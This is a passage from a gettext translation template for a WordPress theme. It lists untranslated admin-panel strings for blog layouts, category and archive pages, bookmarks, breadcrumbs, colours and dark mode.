#: backend/panels/block-list.php:428 backend/panels/block-list.php:623 #: backend/panels/blog-pages.php:400 backend/panels/blog-pages.php:887 #: backend/panels/blog-pages.php:1301 backend/panels/blog-pages.php:1709 #: backend/panels/blog-pages.php:2201 backend/panels/bookmark.php:299 #: backend/panels/bookmark.php:747 msgid "Review Meta Description" msgstr "" #: backend/panels/block-classic.php:92 backend/panels/block-grid.php:92 #: backend/panels/block-grid.php:257 backend/panels/block-grid.php:422 #: backend/panels/block-grid.php:595 backend/panels/block-grid.php:782 #: backend/panels/block-list.php:100 backend/panels/block-list.php:273 #: backend/panels/block-list.php:454 backend/panels/block-list.php:649 #: backend/panels/blog-pages.php:437 backend/panels/blog-pages.php:924 #: backend/panels/blog-pages.php:1338 backend/panels/blog-pages.php:1746 #: backend/panels/blog-pages.php:2238 backend/panels/bookmark.php:336 #: backend/panels/bookmark.php:784 msgid "Leave this option blank or set 0 to disable." msgstr "" #: backend/panels/block-classic.php:113 backend/panels/block-grid.php:113 #: backend/panels/block-grid.php:278 backend/panels/block-grid.php:443 #: backend/panels/block-grid.php:616 backend/panels/block-grid.php:803 #: backend/panels/block-list.php:121 backend/panels/block-list.php:294 #: backend/panels/block-list.php:475 backend/panels/block-list.php:670 msgid "Sponsored Meta" msgstr "" #: backend/panels/block-classic.php:114 backend/panels/block-grid.php:114 #: backend/panels/block-grid.php:279 backend/panels/block-grid.php:444 #: backend/panels/block-grid.php:617 backend/panels/block-grid.php:804 #: backend/panels/block-list.php:122 backend/panels/block-list.php:295 #: backend/panels/block-list.php:476 backend/panels/block-list.php:671 msgid "Enable or disable the \"sponsored by\" meta." msgstr "" #: backend/panels/block-classic.php:139 backend/panels/block-grid.php:139 #: backend/panels/block-grid.php:304 backend/panels/block-grid.php:469 #: backend/panels/block-grid.php:642 backend/panels/block-grid.php:829 #: backend/panels/block-list.php:147 backend/panels/block-list.php:320 #: backend/panels/block-list.php:501 backend/panels/block-list.php:696 msgid "" "Select entry meta tags you would like to hide on the tablet devices. In case long meta " "it would be useful." msgstr "" #: backend/panels/block-classic.php:148 backend/panels/block-grid.php:148 #: backend/panels/block-grid.php:313 backend/panels/block-grid.php:478 #: backend/panels/block-grid.php:651 backend/panels/block-grid.php:838 #: backend/panels/block-list.php:156 backend/panels/block-list.php:329 #: backend/panels/block-list.php:510 backend/panels/block-list.php:705 msgid "" "Select entry meta tags you would like to hide on the mobile devices. In case long meta " "it would be useful." msgstr "" #: backend/panels/block-classic.php:163 backend/panels/block-grid.php:163 #: backend/panels/block-grid.php:328 backend/panels/block-grid.php:493 #: backend/panels/block-grid.php:666 backend/panels/block-grid.php:853 #: backend/panels/block-list.php:171 backend/panels/block-list.php:344 #: backend/panels/block-list.php:539 backend/panels/block-list.php:734 msgid "Centering Content" msgstr "" #: backend/panels/block-classic.php:164 backend/panels/block-grid.php:164 #: backend/panels/block-grid.php:329 backend/panels/block-grid.php:494 #: backend/panels/block-grid.php:667 backend/panels/block-grid.php:854 #: backend/panels/block-list.php:172 backend/panels/block-list.php:345 #: backend/panels/block-list.php:540 backend/panels/block-list.php:735 msgid "Centering text and elements for the post listing." msgstr "" #: backend/panels/block-grid.php:20 msgid "" "These are settings for the Grid 1 (standard). It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:27 backend/panels/block-grid.php:192 msgid "grid" msgstr "" #: backend/panels/block-grid.php:185 msgid "" "These are settings for the grid 2 layout. It will be overridden by the \"Block Design" "\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:350 msgid "" "These are settings for the small grid layout. It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)" msgstr "" #: backend/panels/block-grid.php:357 msgid "small grid" msgstr "" #: backend/panels/block-grid.php:515 msgid "" "These are settings for the boxed grid 1. It will be overridden by the \"Block Design" "\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:522 backend/panels/block-grid.php:709 #: backend/panels/block-list.php:373 backend/panels/block-list.php:568 msgid "boxed grid" msgstr "" #: backend/panels/block-grid.php:526 backend/panels/block-grid.php:713 #: backend/panels/block-list.php:377 backend/panels/block-list.php:572 msgid "Box Style" msgstr "" #: backend/panels/block-grid.php:527 backend/panels/block-grid.php:714 #: backend/panels/block-list.php:378 backend/panels/block-list.php:573 msgid "Select a box style for the post listing." msgstr "" #: backend/panels/block-grid.php:672 backend/panels/block-grid.php:859 #: backend/panels/block-list.php:524 backend/panels/block-list.php:719 msgid "Box Color" msgstr "" #: backend/panels/block-grid.php:673 backend/panels/block-grid.php:860 #: backend/panels/block-list.php:525 backend/panels/block-list.php:720 msgid "Select a color for the background or border style." msgstr "" #: backend/panels/block-grid.php:679 backend/panels/block-grid.php:866 #: backend/panels/block-list.php:531 backend/panels/block-list.php:726 msgid "Dark - Box Color" msgstr "" #: backend/panels/block-grid.php:680 backend/panels/block-grid.php:867 msgid "Select a color for the background or border style in the dark mode." msgstr "" #: backend/panels/block-grid.php:702 msgid "" "These are settings for the boxed grid 2. It will be overridden by the \"Block Design" "\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:20 msgid "" "These are settings for the list 1 (standard) layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-list.php:27 backend/panels/block-list.php:200 msgid "list" msgstr "" #: backend/panels/block-list.php:39 backend/panels/block-list.php:212 #: backend/panels/block-list.php:393 backend/panels/block-list.php:588 msgid "Featured Position" msgstr "" #: backend/panels/block-list.php:40 backend/panels/block-list.php:213 #: backend/panels/block-list.php:394 backend/panels/block-list.php:589 msgid "Select a position for the featured image. " msgstr "" #: backend/panels/block-list.php:193 msgid "" "These are settings for the list 2. It will be overridden by the \"Block Design\" (for " "Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:366 msgid "" "These are settings for the boxed list 1. It will be overridden by the \"Block Design" "\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:532 backend/panels/block-list.php:727 msgid "" "Select a color for the background or border style in the dark mode or light scheme " "mode." msgstr "" #: backend/panels/block-list.php:561 msgid "" "These are settings for the boxed list 2. It will be overridden by the \"Block Design" "\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive pages)." msgstr "" #: backend/panels/blocks.php:14 msgid "Standard Blog Design" msgstr "" #: backend/panels/blog-pages.php:17 msgid "Category" msgstr "" #: backend/panels/blog-pages.php:19 msgid "" "These are global category settings. The settings below will apply to all category " "pages." msgstr "" #: backend/panels/blog-pages.php:25 msgid "" "To edit for individual category, navigate to \"Admin Dashboard > Posts > Categories > " "Edit\"." msgstr "" #: backend/panels/blog-pages.php:38 msgid "Select a website header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:45 backend/panels/blog-pages.php:611 #: backend/panels/blog-pages.php:1929 backend/panels/header-style.php:68 #: backend/panels/header-style.php:345 backend/panels/header-style.php:613 #: backend/single-metaboxes.php:129 backend/single-metaboxes.php:906 msgid "Navigation Bar Style" msgstr "" #: backend/panels/blog-pages.php:46 msgid "Select navigation bar style for the site header in the category pages." msgstr "" #: backend/panels/blog-pages.php:47 backend/panels/blog-pages.php:613 #: backend/panels/blog-pages.php:1931 msgid "" "This setting will override on the setting in the header panel. It will not apply to " "the header style 4." msgstr "" #: backend/panels/blog-pages.php:52 backend/panels/blog-pages.php:618 #: backend/panels/blog-pages.php:1936 backend/panels/header-style.php:73 #: backend/panels/header-style.php:619 backend/single-metaboxes.php:135 #: backend/single-metaboxes.php:912 msgid "Dark Bottom Border" msgstr "" #: backend/panels/blog-pages.php:53 backend/panels/blog-pages.php:619 #: backend/panels/blog-pages.php:1937 backend/panels/design.php:276 #: backend/panels/header-style.php:74 backend/panels/header-style.php:622 #: backend/single-metaboxes.php:136 backend/single-metaboxes.php:913 msgid "None" msgstr "" #: backend/panels/blog-pages.php:61 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the category " "pages." msgstr "" #: backend/panels/blog-pages.php:62 backend/panels/blog-pages.php:628 #: backend/panels/blog-pages.php:1946 msgid "" "This setting will override on the \"Header Style\" setting, Leave it blank if you " "would like to use the \"Header Style\" setting." msgstr "" #: backend/panels/blog-pages.php:83 msgid "Disable or select a category header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:99 msgid "Enable or disable the sub category list in the category header." msgstr "" #: backend/panels/blog-pages.php:120 msgid "" "Input a \"Ruby Template\" shortcode to embed it after the category header, ie: " "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:121 msgid "" "This setting will be overridden by \"template shortcode\" in the individual category " "setting panel." msgstr "" #: backend/panels/blog-pages.php:154 backend/panels/blog-pages.php:1107 #: backend/panels/blog-pages.php:1516 backend/panels/blog-pages.php:2008 msgid "" "Input a \"Ruby Template\" shortcode to display as the main blog posts, ie: " "[Ruby_E_Template id=\"1\"]." msgstr "" #: backend/panels/blog-pages.php:155 msgid "" "This setting will be overridden by \"Global WP Query Template Shortcode\" in the " "individual category setting panel." msgstr "" #: backend/panels/blog-pages.php:178 msgid "" "Select posts per page for the categories. Leave this option blank to set the default." msgstr "" #: backend/panels/blog-pages.php:179 backend/panels/blog-pages.php:715 #: backend/panels/blog-pages.php:1130 msgid "" "This setting will override on \"Dashboard > Settings > Reading > Blog pages show at " "most\" setting. It also apply to the \"Global WP Query Template Shortcode\"." msgstr "" #: backend/panels/blog-pages.php:197 backend/panels/blog-pages.php:245 #: backend/panels/blog-pages.php:299 backend/panels/blog-pages.php:342 #: backend/panels/blog-pages.php:542 backend/panels/blog-pages.php:732 #: backend/panels/blog-pages.php:786 backend/panels/blog-pages.php:829 #: backend/panels/blog-pages.php:1030 backend/panels/blog-pages.php:1146 #: backend/panels/blog-pages.php:1200 backend/panels/blog-pages.php:1243 #: backend/panels/blog-pages.php:1443 backend/panels/blog-pages.php:1554 #: backend/panels/blog-pages.php:1608 backend/panels/blog-pages.php:1651 #: backend/panels/blog-pages.php:1851 backend/panels/blog-pages.php:2046 #: backend/panels/blog-pages.php:2100 backend/panels/blog-pages.php:2143 msgid "" "The settings below will be not available if you use \"Global WP Query Template " "Shortcode\" to build the blog listing." msgstr "" #: backend/panels/blog-pages.php:198 msgid "" "The theme supports heading dynamic content, Please read the documentation for further " "information." msgstr "" #: backend/panels/blog-pages.php:205 msgid "Input a heading for the post listing. Leave blank to disable this section" msgstr "" #: backend/panels/blog-pages.php:228 msgid "Input a custom font size value for the category heading (px) on the desktop." msgstr "" #: backend/panels/blog-pages.php:229 msgid "" "Navigate to \"Heading Design\" panel to edit font size for table and mobile device." msgstr "" #: backend/panels/blog-pages.php:250 backend/panels/blog-pages.php:731 #: backend/panels/blog-pages.php:737 backend/panels/blog-pages.php:1145 #: backend/panels/blog-pages.php:1151 backend/panels/blog-pages.php:1553 #: backend/panels/blog-pages.php:1559 backend/panels/blog-pages.php:2045 #: backend/panels/blog-pages.php:2051 backend/panels/bookmark.php:149 #: backend/panels/bookmark.php:154 backend/panels/bookmark.php:594 #: backend/panels/single-post.php:1336 msgid "Blog Layout" msgstr "" #: backend/panels/blog-pages.php:251 msgid "Select blog listing layout for the category pages." msgstr "" #: backend/panels/blog-pages.php:259 backend/panels/blog-pages.php:746 #: backend/panels/blog-pages.php:1160 backend/panels/blog-pages.php:1568 #: backend/panels/blog-pages.php:2060 backend/panels/bookmark.php:163 #: backend/panels/bookmark.php:603 msgid "Select total columns to show per row." msgstr "" #: backend/panels/blog-pages.php:267 backend/panels/blog-pages.php:754 #: backend/panels/blog-pages.php:1168 backend/panels/blog-pages.php:1576 #: backend/panels/blog-pages.php:2068 backend/panels/bookmark.php:171 #: backend/panels/bookmark.php:611 msgid "Select total columns to show per row on the tablet device." msgstr "" #: backend/panels/blog-pages.php:275 backend/panels/blog-pages.php:762 #: backend/panels/blog-pages.php:1176 backend/panels/blog-pages.php:1584 #: backend/panels/blog-pages.php:2076 backend/panels/bookmark.php:179 #: backend/panels/bookmark.php:619 msgid "Select total columns to show per row on the mobile device." msgstr "" #: backend/panels/blog-pages.php:283 backend/panels/blog-pages.php:770 #: backend/panels/blog-pages.php:1184 backend/panels/blog-pages.php:1592 #: backend/panels/blog-pages.php:2084 backend/panels/bookmark.php:187 #: backend/panels/bookmark.php:627 backend/panels/bookmark.php:635 msgid "Select a spacing between columns." msgstr "" #: backend/panels/blog-pages.php:306 backend/panels/blog-pages.php:793 #: backend/panels/blog-pages.php:1207 backend/panels/blog-pages.php:1615 #: backend/panels/bookmark.php:209 msgid "Select a sidebar position or disable it for the latest blog section" msgstr "" #: backend/panels/blog-pages.php:322 backend/panels/bookmark.php:225 #: backend/panels/bookmark.php:673 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the category pages." msgstr "" #: backend/panels/blog-pages.php:343 backend/panels/blog-pages.php:830 #: backend/panels/blog-pages.php:1244 backend/panels/blog-pages.php:1652 #: backend/panels/blog-pages.php:2144 backend/panels/bookmark.php:244 #: backend/panels/bookmark.php:692 msgid "" "The theme will use \"Standard Blog Design\" settings to render block. You can override " "settings in the panel below." msgstr "" #: backend/panels/blog-pages.php:366 backend/panels/blog-pages.php:853 #: backend/panels/blog-pages.php:1267 backend/panels/blog-pages.php:1675 #: backend/panels/blog-pages.php:2167 msgid "" "The setting will not apply if the selected blog layout does not support the selected " "entry category." msgstr "" #: backend/panels/blog-pages.php:425 backend/panels/blog-pages.php:912 #: backend/panels/blog-pages.php:1326 backend/panels/blog-pages.php:1734 #: backend/panels/blog-pages.php:2226 backend/panels/bookmark.php:324 #: backend/panels/bookmark.php:772 msgid "Disable or select settings for the post excerpt." msgstr "" #: backend/panels/blog-pages.php:505 backend/panels/blog-pages.php:992 #: backend/panels/blog-pages.php:1406 backend/panels/blog-pages.php:1814 #: backend/panels/blog-pages.php:2306 backend/panels/bookmark.php:852 #: backend/panels/single-post.php:609 backend/panels/single-post.php:618 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For example: " "avatar, author... Keys include: [avatar, author, date, category, tag, view, comment, " "update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/panels/blog-pages.php:513 backend/panels/blog-pages.php:1000 #: backend/panels/blog-pages.php:1414 backend/panels/blog-pages.php:1822 #: backend/panels/blog-pages.php:2314 backend/panels/bookmark.php:860 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For example: " "avatar, author... Keys include: [avatar, author, date, category, tag, view, comment, " "update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/panels/blog-pages.php:548 msgid "Select pagination type for the category pages." msgstr "" #: backend/panels/blog-pages.php:571 msgid "Blog & Archive" msgstr "" #: backend/panels/blog-pages.php:588 msgid "Blog Index" msgstr "" #: backend/panels/blog-pages.php:590 msgid "The settings below apply the blog page." msgstr "" #: backend/panels/blog-pages.php:604 msgid "Select a website header style for the blog page." msgstr "" #: backend/panels/blog-pages.php:612 msgid "Select navigation bar style for the site header in the blog index page." msgstr "" #: backend/panels/blog-pages.php:627 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the blog page." msgstr "" #: backend/panels/blog-pages.php:643 msgid "Top & Bottom Area Template Builder" msgstr "" #: backend/panels/blog-pages.php:650 msgid "" "Input a \"Ruby Template\" shortcode to embed it the top of the blog page, ie: " "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:658 msgid "Bottom Area Template Shortcode" msgstr "" #: backend/panels/blog-pages.php:659 msgid "" "Input a \"Ruby Template\" shortcode to embed it the bottom of the blog page, ie: " "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:692 msgid "Input a \"Ruby Template\" shortcode to show it as a the main blog listing." msgstr "" #: backend/panels/blog-pages.php:694 msgid "Leave this option blank if you want to use standard blog layout settings." msgstr "" #: backend/panels/blog-pages.php:714 msgid "Select posts per page for the blog. Leave this option blank to set the default." msgstr "" #: backend/panels/blog-pages.php:738 msgid "Select blog listing layout for the blog." msgstr "" #: backend/panels/blog-pages.php:785 backend/panels/blog-pages.php:1199 #: backend/panels/blog-pages.php:1607 backend/panels/blog-pages.php:2099 #: backend/panels/bookmark.php:202 backend/panels/bookmark.php:650 msgid "Blog Sidebar" msgstr "" #: backend/panels/blog-pages.php:809 msgid "Enable or disable sticky sidebar feature. This setting applies to the blog page." msgstr "" #: backend/panels/blog-pages.php:1029 msgid "Pagination" msgstr "" #: backend/panels/blog-pages.php:1036 msgid "Select pagination type for the blog." msgstr "" #: backend/panels/blog-pages.php:1063 msgid "Author" msgstr "" #: backend/panels/blog-pages.php:1066 msgid "The settings below apply to the author pages." msgstr "" #: backend/panels/blog-pages.php:1072 msgid "Author Header" msgstr "" #: backend/panels/blog-pages.php:1077 msgid "Author Bio" msgstr "" #: backend/panels/blog-pages.php:1078 msgid "Enable or disable the author bio in the author pages." msgstr "" #: backend/panels/blog-pages.php:1085 msgid "Select a background style for the author header." msgstr "" #: backend/panels/blog-pages.php:1129 msgid "" "Select posts per page for the authors. Leave this option blank to set the default." msgstr "" #: backend/panels/blog-pages.php:1152 msgid "Select blog listing layout for the author pages." msgstr "" #: backend/panels/blog-pages.php:1223 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the author pages." msgstr "" #: backend/panels/blog-pages.php:1442 backend/panels/blog-pages.php:1850 #: backend/panels/blog-pages.php:2342 backend/panels/bookmark.php:556 msgid "Blog Pagination" msgstr "" #: backend/panels/blog-pages.php:1449 msgid "Select pagination type for the author pages." msgstr "" #: backend/panels/blog-pages.php:1478 msgid "Tags & Archives" msgstr "" #: backend/panels/blog-pages.php:1481 msgid "The settings below apply to the tags and other archive pages." msgstr "" #: backend/panels/blog-pages.php:1487 msgid "Archive Header" msgstr "" #: backend/panels/blog-pages.php:1493 msgid "Select a background style for the archive header." msgstr "" #: backend/panels/blog-pages.php:1510 msgid "" "Ajax pagination is only available for the tag. The theme will fallback to the numeric " "type for other archive pages." msgstr "" #: backend/panels/blog-pages.php:1538 msgid "" "Select posts per page for the archives. Leave this option blank to set the default." msgstr "" #: backend/panels/blog-pages.php:1560 msgid "Select blog listing layout for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1631 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the archive pages." msgstr "" #: backend/panels/blog-pages.php:1857 msgid "Select pagination type for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1886 backend/panels/header.php:190 searchform.php:18 #: templates/header/templates.php:345 templates/parts.php:477 msgid "Search" msgstr "" #: backend/panels/blog-pages.php:1888 msgid "The settings below apply to the search page." msgstr "" #: backend/panels/blog-pages.php:1895 msgid "Search Filter" msgstr "" #: backend/panels/blog-pages.php:1900 msgid "Only Search Posts" msgstr "" #: backend/panels/blog-pages.php:1901 msgid "Only display posts in the search results." msgstr "" #: backend/panels/blog-pages.php:1922 msgid "Select a website header style for the search page." msgstr "" #: backend/panels/blog-pages.php:1930 msgid "Select navigation bar style for the site header in the search page." msgstr "" #: backend/panels/blog-pages.php:1945 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the search " "page." msgstr "" #: backend/panels/blog-pages.php:1961 msgid "Search Header" msgstr "" #: backend/panels/blog-pages.php:1968 backend/panels/header.php:408 #: backend/panels/header.php:462 msgid "Header Background" msgstr "" #: backend/panels/blog-pages.php:1969 msgid "Upload a background image for the search header." msgstr "" #: backend/panels/blog-pages.php:1982 msgid "Dark Mode - Header Background" msgstr "" #: backend/panels/blog-pages.php:1983 msgid "Upload a background image for the search header in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2030 msgid "" "Select posts per page for the search result listing. Leave this option blank to set " "the default." msgstr "" #: backend/panels/blog-pages.php:2052 msgid "Select blog listing layout for the search result listing." msgstr "" #: backend/panels/blog-pages.php:2107 msgid "Select a sidebar position or disable it for the search result listing." msgstr "" #: backend/panels/blog-pages.php:2123 backend/panels/blog-pages.php:2343 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the search pages." msgstr "" #: backend/panels/blog-pages.php:2349 msgid "Select pagination type for the search result listing." msgstr "" #: backend/panels/blog-pages.php:2375 msgid "404 Page" msgstr "" #: backend/panels/blog-pages.php:2377 msgid "The settings below apply to the 404 page." msgstr "" #: backend/panels/blog-pages.php:2382 msgid "" "The image will be limited at 300px of height. Recommended image height is about 600px " "for the retina screen." msgstr "" #: backend/panels/blog-pages.php:2390 msgid "Header Image" msgstr "" #: backend/panels/blog-pages.php:2391 msgid "Upload a header image for the 404 page." msgstr "" #: backend/panels/blog-pages.php:2398 msgid "Dark Header Image" msgstr "" #: backend/panels/blog-pages.php:2399 msgid "Upload a header image for the 404 page in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2405 msgid "" "Input a heading for the 404 page. Leave this option blank to set it as the default." msgstr "" #: backend/panels/blog-pages.php:2412 msgid "" "Input your description for the 404 page. Leave this option blank to set it as the " "default." msgstr "" #: backend/panels/blog-pages.php:2418 msgid "Search Form" msgstr "" #: backend/panels/blog-pages.php:2419 msgid "Enable or disable the search form." msgstr "" #: backend/panels/bookmark.php:14 backend/panels/bookmark.php:37 msgid "Bookmark System" msgstr "" #: backend/panels/bookmark.php:16 msgid "Select settings for the bookmark system." msgstr "" #: backend/panels/bookmark.php:30 msgid "Select general settings for the bookmark system." msgstr "" #: backend/panels/bookmark.php:38 msgid "" "Enable or disable the bookmark feature. This is global option and will apply to whole " "the website." msgstr "" #: backend/panels/bookmark.php:44 msgid "Popup Notification" msgstr "" #: backend/panels/bookmark.php:45 msgid "Enable or disable the popup notification when users add or remove a post." msgstr "" #: backend/panels/bookmark.php:51 backend/panels/table-contents.php:125 msgid "Enable When" msgstr "" #: backend/panels/bookmark.php:52 msgid "Allow or disallow guest users can bookmark posts." msgstr "" #: backend/panels/bookmark.php:54 msgid "Guest and Logged Users" msgstr "" #: backend/panels/bookmark.php:55 msgid "Only Logged Users" msgstr "" #: backend/panels/bookmark.php:56 msgid "Redirect to Login for Guest Users" msgstr "" #: backend/panels/bookmark.php:63 backend/panels/header.php:588 #: backend/panels/login.php:103 msgid "Login Redirect URL" msgstr "" #: backend/panels/bookmark.php:64 msgid "" "Input the redirect URL when user logged. Leave this option blank to set the default " "value." msgstr "" #: backend/panels/bookmark.php:71 msgid "Guest Bookmark Expiration" msgstr "" #: backend/panels/bookmark.php:72 msgid "" "Input max expiration (days) to save bookmarks for the guest users. Set 0 for no " "expiration." msgstr "" #: backend/panels/bookmark.php:88 backend/panels/bookmark.php:106 #: templates/header/templates.php:710 msgid "Reading List" msgstr "" #: backend/panels/bookmark.php:90 msgid "Select settings for the reading list section." msgstr "" #: backend/panels/bookmark.php:98 msgid "Reading List Header" msgstr "" #: backend/panels/bookmark.php:104 backend/panels/bookmark.php:447 #: backend/panels/bookmark.php:518 msgid "Section Heading" msgstr "" #: backend/panels/bookmark.php:105 backend/panels/bookmark.php:448 #: backend/panels/bookmark.php:519 msgid "Input a heading for this section." msgstr "" #: backend/panels/bookmark.php:111 backend/panels/bookmark.php:454 msgid "Section Description" msgstr "" #: backend/panels/bookmark.php:112 backend/panels/bookmark.php:455 msgid "Input description for this section." msgstr "" #: backend/panels/bookmark.php:113 msgid "you'll find all saved articles here." msgstr "" #: backend/panels/bookmark.php:120 backend/panels/bookmark.php:463 msgid "Description Image" msgstr "" #: backend/panels/bookmark.php:121 backend/panels/bookmark.php:464 msgid "Upload a image for displaying at the top heading. Image height is 60px." msgstr "" #: backend/panels/bookmark.php:128 backend/panels/bookmark.php:471 msgid "Dark Mode - Description Image" msgstr "" #: backend/panels/bookmark.php:129 backend/panels/bookmark.php:472 msgid "Upload a image for displaying at the top heading in the dark mode." msgstr "" #: backend/panels/bookmark.php:133 backend/panels/bookmark.php:483 msgid "Heading background Style" msgstr "" #: backend/panels/bookmark.php:134 backend/panels/bookmark.php:484 msgid "Select a background style for this heading." msgstr "" #: backend/panels/bookmark.php:155 msgid "Select blog listing layout for the saved pages." msgstr "" #: backend/panels/bookmark.php:404 msgid "" "Select entry meta you would like to hide on the mobile devices. In case long meta it " "would be useful." msgstr "" #: backend/panels/bookmark.php:438 msgid "User Interests" msgstr "" #: backend/panels/bookmark.php:440 msgid "Select settings for the user interests section." msgstr "" #: backend/panels/bookmark.php:449 msgid "Your Categories" msgstr "" #: backend/panels/bookmark.php:456 msgid "Follow categories that you're interested in" msgstr "" #: backend/panels/bookmark.php:477 msgid "Follow Page URL" msgstr "" #: backend/panels/bookmark.php:478 msgid "Input the follow page URL for user can redirect to add their interests." msgstr "" #: backend/panels/bookmark.php:504 msgid "Select settings for the recommended section." msgstr "" #: backend/panels/bookmark.php:512 msgid "Recommended Heading" msgstr "" #: backend/panels/bookmark.php:520 msgid "Recommended for You" msgstr "" #: backend/panels/bookmark.php:533 backend/panels/single-post.php:1320 msgid "Select a HTML tag for this heading." msgstr "" #: backend/panels/bookmark.php:541 backend/panels/single-post.php:1328 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave this option " "blank to set the default." msgstr "" #: backend/panels/bookmark.php:562 msgid "Select posts per page for this section." msgstr "" #: backend/panels/bookmark.php:570 msgid "Select pagination type for this section." msgstr "" #: backend/panels/bookmark.php:589 msgid "Layout" msgstr "" #: backend/panels/bookmark.php:595 msgid "Select blog listing layout for this section." msgstr "" #: backend/panels/bookmark.php:657 msgid "Select a sidebar position or disable it for this section." msgstr "" #: backend/panels/bookmark.php:665 msgid "Assign a widget section for the sidebar for this section if it is enabled." msgstr "" #: backend/panels/breadcrumb.php:14 backend/panels/breadcrumb.php:30 msgid "Breadcrumb Bar" msgstr "" #: backend/panels/breadcrumb.php:16 msgid "The theme supports Navxt plugin Yoast SEO and Rank Math SEO breadcrumbs." msgstr "" #: backend/panels/breadcrumb.php:23 msgid "Global Setting" msgstr "" #: backend/panels/breadcrumb.php:24 msgid "" "These settings below require to activate Navxt plugin Yoast SEO and Rank Math SEO " "breadcrumbs in order to work." msgstr "" #: backend/panels/breadcrumb.php:31 msgid "Enable or disable the breadcrumb bar for your website." msgstr "" #: backend/panels/breadcrumb.php:45 msgid "Page Breadcrumbs" msgstr "" #: backend/panels/breadcrumb.php:50 msgid "Single Post Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:51 msgid "Enable or disable the breadcrumb bar in the single post." msgstr "" #: backend/panels/breadcrumb.php:61 msgid "Single Page Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:62 msgid "Enable or disable the breadcrumb bar in the single page." msgstr "" #: backend/panels/breadcrumb.php:72 msgid "Category Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:73 msgid "Enable or disable the breadcrumb in the category pages." msgstr "" #: backend/panels/breadcrumb.php:83 msgid "Author Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:84 msgid "Enable or disable the breadcrumb in the author pages." msgstr "" #: backend/panels/breadcrumb.php:94 msgid "Archive Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:95 msgid "Enable or disable the breadcrumb in the archive pages." msgstr "" #: backend/panels/color.php:15 msgid "Global Colors" msgstr "" #: backend/panels/color.php:16 msgid "" "Select colors for your website. To organize the panel and make it easy to use, you may " "also see color settings for each elements in it's panel." msgstr "" #: backend/panels/color.php:23 msgid "Highlight Colors" msgstr "" #: backend/panels/color.php:28 msgid "Global Highlight Color" msgstr "" #: backend/panels/color.php:29 msgid "" "Select a global color, This setting apply to all links, menu, category overlays, main " "page and many contrasting elements." msgstr "" #: backend/panels/color.php:36 msgid "Dark Mode - Global Highlight Color" msgstr "" #: backend/panels/color.php:37 msgid "Select a global color in the dark mode." msgstr "" #: backend/panels/color.php:52 msgid "Dark Accent Colors" msgstr "" #: backend/panels/color.php:57 msgid "Dark Accent Color" msgstr "" #: backend/panels/color.php:58 msgid "" "Select a dark accent color for your website, This setting apply to single header " "background, gradient colors." msgstr "" #: backend/panels/color.php:65 msgid "Dark Mode - Dark Accent Color" msgstr "" #: backend/panels/color.php:66 msgid "Select dark accent color in the dark mode." msgstr "" #: backend/panels/color.php:81 backend/panels/header-style.php:185 #: backend/panels/header-style.php:474 backend/panels/header-style.php:740 #: backend/panels/header.php:456 msgid "Dark Mode Colors" msgstr "" #: backend/panels/color.php:86 msgid "Dark Mode Background" msgstr "" #: backend/panels/color.php:87 msgid "" "Select a dark solid background for the dark mode. Leave blank to set it as the default." msgstr "" #: backend/panels/color.php:94 msgid "Mode Switcher - Light Icon Color" msgstr "" #: backend/panels/color.php:95 msgid "" "Select a color for the light mode icon (Sun icon) of the dark mode switcher button to " "fit with the main navigation color." msgstr "" #: backend/panels/color.php:102 msgid "Mode Switcher - Dark Icon Background" msgstr "" #: backend/panels/color.php:103 msgid "" "Select a background for the dark mode icon (Moon icon) of the dark mode switcher " "button to fit with the main navigation color." msgstr "" #: backend/panels/color.php:118 msgid "Miscellaneous" msgstr "" #: backend/panels/color.php:123 msgid "Excerpt Color" msgstr "" #: backend/panels/color.php:124 msgid "Select a color for post excerpt text." msgstr "" #: backend/panels/color.php:125 backend/panels/color.php:142 msgid "This setting will apply to the default mode." msgstr "" #: backend/panels/color.php:132 msgid "Review Star Color" msgstr "" #: backend/panels/color.php:133 msgid "Select a color value for the star icons." msgstr "" #: backend/panels/color.php:140 msgid "Breadcrumb Color" msgstr "" #: backend/panels/color.php:141 msgid "Select a color for the breadcrumb bar." msgstr "" #: backend/panels/dark-mode.php:16 backend/panels/dark-mode.php:28 msgid "Dark Mode" msgstr "" #: backend/panels/dark-mode.php:17 msgid "Select settings for the dark mode." msgstr "" #: 